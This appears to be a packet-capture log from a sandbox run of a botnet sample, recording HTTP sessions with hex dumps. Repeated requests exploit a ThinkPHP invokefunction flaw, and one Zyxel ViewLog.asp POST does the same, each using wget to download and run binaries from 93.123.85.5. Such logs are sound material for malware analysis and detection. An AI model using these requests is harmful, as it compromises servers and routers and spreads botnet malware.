69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 61 63 74 69 76 65 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 3c 2f 73 74 79
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Page Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="404 - Page Not Found"/> <style type="text/css"> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin: -3px 0 39px;} p {width:375px; text-align:center; margin-left:auto;margin-right:auto; margin-top: 30px } div {width:375px; text-align:center; margin-left:auto;margin-right:auto;} a:link {color: #34536A;} a:visited {color: #34536A;} a:active {color: #34536A;} a:hover {color: #34536A;} </sty
                                                              Nov 13, 2023 22:18:32.109837055 CET4075INData Raw: 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 6c 6f 6f 66 2e 74 79 65 6e 74 73 75 73 61 2e 63 6f 6d 2f 22 3e 61 6c 6f 6f 66 2e 74 79 65 6e 74 73 75 73 61 2e 63 6f
                                                              Data Ascii: le></head><body> <p><a href="http://aloof.tyentsusa.com/">aloof.tyentsusa.com</a></p> <h1>404</h1> <h2>Page Not Found</h2> <div> The page you were trying to reach does not exist. Or, maybe it has moved. You ca


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              156192.168.2.235714295.131.90.10180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:32.309098005 CET4078OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:32.644301891 CET4083INHTTP/1.1 400 Bad Request
                                                              Server: nginx/1.1.19
                                                              Date: Mon, 13 Nov 2023 21:20:42 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 173
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 2e 31 39 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.1.19</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              157192.168.2.233596295.165.94.14380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:32.322429895 CET4079OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:32.672254086 CET4085INHTTP/1.1 400 Bad Request
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              X-Content-Type-Options: nosniff
                                                              X-XSS-Protection: 1; mode=block
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Security-Policy: frame-ancestors 'self';
                                                              Cache-Control: no-cache,no-store
                                                              Pragma: no-cache
                                                              Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0a 59 6f 75 72 20 72 65 71 75 65 73 74 20 68 61 73 20 62 61 64 20 73 79 6e 74 61 78 20 6f 72 20 69 73 20 69 6e 68 65 72 65 6e 74 6c 79 20 69 6d 70 6f 73 73 69 62 6c 65 20 74 6f 20 73 61 74 69 73 66 79 2e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50
                                                              Data Ascii: <html> <head><title>400 Bad Request</title></head> <body bgcolor="#FFFFFF" text="#000000" link="#2020ff" vlink="#4040cc"> <h2>400 Bad Request</h2>Your request has bad syntax or is inherently impossible to satisfy.<div style="display:none"><ajax_response_xml_root><IF_ERRORSTR>SessionTimeout</IF_ERRORSTR><IF_ERRORPARAM>SUCC</IF_ERRORPARAM><IF_ERRORTYPE>SUCC</IF_ERRORTYPE></ajax_response_xml_root><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>P
                                                              Nov 13, 2023 22:18:32.672266960 CET4085INData Raw: 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e
                                                              Data Ascii: adding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span></div><hr /></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              158192.168.2.235756695.255.95.24480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:32.467423916 CET4081OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:32.879014969 CET4183INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:18:32 GMT
                                                              Server: Apache/2.4.34 (Unix) LibreSSL/2.5.5
                                                              Vary: accept-language,accept-charset
                                                              Content-Length: 224
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-XSS-Protection: 1; mode=block
                                                              Connection: close
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Language: en
                                                              Expires: Mon, 13 Nov 2023 21:18:32 GMT
                                                              Data Raw: 3c 21 2d 2d 23 73 65 74 20 76 61 72 3d 22 54 49 54 4c 45 22 20 76 61 6c 75 65 3d 22 42 61 64 20 72 65 71 75 65 73 74 21 22 0a 2d 2d 3e 3c 21 2d 2d 23 69 6e 63 6c 75 64 65 20 76 69 72 74 75 61 6c 3d 22 69 6e 63 6c 75 64 65 2f 74 6f 70 2e 68 74 6d 6c 22 20 2d 2d 3e 0a 0a 20 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 28 6f 72 20 70 72 6f 78 79 29 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 0a 20 20 20 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 0a 0a 3c 21 2d 2d 23 69 6e 63 6c 75 64 65 20 76 69 72 74 75 61 6c 3d 22 69 6e 63 6c 75 64 65 2f 62 6f 74 74 6f 6d 2e 68 74 6d 6c 22 20 2d 2d 3e 0a
                                                              Data Ascii: ...#set var="TITLE" value="Bad request!"-->...#include virtual="include/top.html" --> Your browser (or proxy) sent a request that this server could not understand....#include virtual="include/bottom.html" -->


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              159192.168.2.233408888.221.182.15880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:32.591139078 CET4082OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:32.873580933 CET4180INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:18:32 GMT
                                                              Date: Mon, 13 Nov 2023 21:18:32 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 62 33 65 31 32 30 32 26 23 34 36 3b 31 36 39 39 39 31 30 33 31 32 26 23 34 36 3b 32 66 37 30 35 65 64 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;db3e1202&#46;1699910312&#46;2f705ed6</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              16192.168.2.2350884112.90.90.21680
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:01.570842981 CET440OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:01.931123018 CET548INHTTP/1.1 400 Bad Request
                                                              Server: Byte-nginx
                                                              Date: Mon, 13 Nov 2023 21:18:01 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 230
                                                              Connection: close
                                                              via: cache08.gddgcu
                                                              x-request-ip: 156.146.49.168
                                                              x-tt-trace-tag: id=5
                                                              x-response-cinfo: 156.146.49.168
                                                              x-response-cache: miss
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 42 79 74 65 2d 6e 67 69 6e 78 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr/>Powered by Byte-nginx<hr><center>tengine</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              160192.168.2.233733688.198.153.10380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:32.615319014 CET4082OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:32.921066999 CET4191INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:18:32 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              16195.165.94.14380192.168.2.2335970
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:33.022274017 CET4194INHTTP/1.1 400 Bad Request
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              X-Content-Type-Options: nosniff
                                                              X-XSS-Protection: 1; mode=block
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Security-Policy: frame-ancestors 'self';
                                                              Cache-Control: no-cache,no-store
                                                              Pragma: no-cache
                                                              Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0a 59 6f 75 72 20 72 65 71 75 65 73 74 20 68 61 73 20 62 61 64 20 73 79 6e 74 61 78 20 6f 72 20 69 73 20 69 6e 68 65 72 65 6e 74 6c 79 20 69 6d 70 6f 73 73 69 62 6c 65 20 74 6f 20 73 61 74 69 73 66 79 2e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50
                                                              Data Ascii: <html> <head><title>400 Bad Request</title></head> <body bgcolor="#FFFFFF" text="#000000" link="#2020ff" vlink="#4040cc"> <h2>400 Bad Request</h2>Your request has bad syntax or is inherently impossible to satisfy.<div style="display:none"><ajax_response_xml_root><IF_ERRORSTR>SessionTimeout</IF_ERRORSTR><IF_ERRORPARAM>SUCC</IF_ERRORPARAM><IF_ERRORTYPE>SUCC</IF_ERRORTYPE></ajax_response_xml_root><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>P
                                                              Nov 13, 2023 22:18:33.022294998 CET4194INData Raw: 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e
                                                              Data Ascii: adding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span></div><hr /></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              162192.168.2.234025295.110.144.1418080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:33.108974934 CET4197OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:33.433816910 CET4208INHTTP/1.1 404
                                                              Content-Type: text/html;charset=utf-8
                                                              Content-Language: en
                                                              Content-Length: 1047
                                                              Date: Mon, 13 Nov 2023 21:18:33 GMT
